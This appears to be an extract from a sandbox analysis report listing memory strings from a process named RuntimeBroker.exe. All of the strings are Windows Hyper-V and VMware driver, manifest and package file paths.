Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790\vmms.exe.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\vfpext.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\hvloader.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379\hvhostsvc.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586\virtmgmt.msc
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.19041.1682.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\nvspinfo.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.19041.1_none_8d60e49d6e4b7e60.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-hypervisor-events_31bf3856ad364e35_10.0.19041.1_none_642b49da78e510c8.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-f..wallrules.resources_31bf3856ad364e35_10.0.19041.1_en-us_4d711034023df04d.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_4bf902d1685e1d06\MSFT_NetEventVmNetworkAdatper.cdxml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.19041.1_en-us_90826ff4620798e4.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.19041.1682.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\f\vmsmb.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\WindowsVirtualizationUninstall.mof
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\hvservice.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\hvservice.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vdev-offline_31bf3856ad364e35_10.0.19041.1_none_92013f260f9b1b7b.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\VmsProxyHNic.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\f\vmrdvcore.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6\hvhostsvc.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-drivers-hypervisor-bcd_31bf3856ad364e35_10.0.19041.1_none_cbb2f6c087e55fc0.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..s-merged-deployment_31bf3856ad364e35_10.0.19041.1741_none_68a612f12d9ba982.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\vmicrdv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\r\vmsynthfcvdev.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lC:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventVmNetworkAdatper.cdxml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\hvax64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-Host-VirtualMachines-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\vmsynthfcvdev.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\r\vsconfig.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\VmEmulatedStorage.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_273c7dca4464890a\Hyper-V.Types.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_564dad239cbedf01\MSFT_NetEventVmNetworkAdatper.cdxml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3\vmwp.exe.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_62d29611d5954e4f\Hyper-V.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\VmsProxyHNic.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\vmsmb.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\VmsProxy.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\kdhvcom.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\wshhyperv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-d..ers-vmswitch-common_31bf3856ad364e35_10.0.19041.1_none_e5de88ec9eb30808.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\vmswitch.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\f\vsconfig.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\r\RemoteFileBrowse.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: oC:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\winhvr.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\Hyper-V Manager.lnk
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qC:\Windows\servicing\Packages\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.19041.1_none_31900babde4397db.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $C:\Windows\System32\drivers\vmci.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_50c23e4c771f203a\ramparser.sys.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\servicing\Packages\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\kdhvcom.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5\VmEmulatedStorage.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.488.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\r\vmrdvcore.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qC:\Windows\servicing\Packages\HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\servicing\Packages\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\pvhdparser.sys
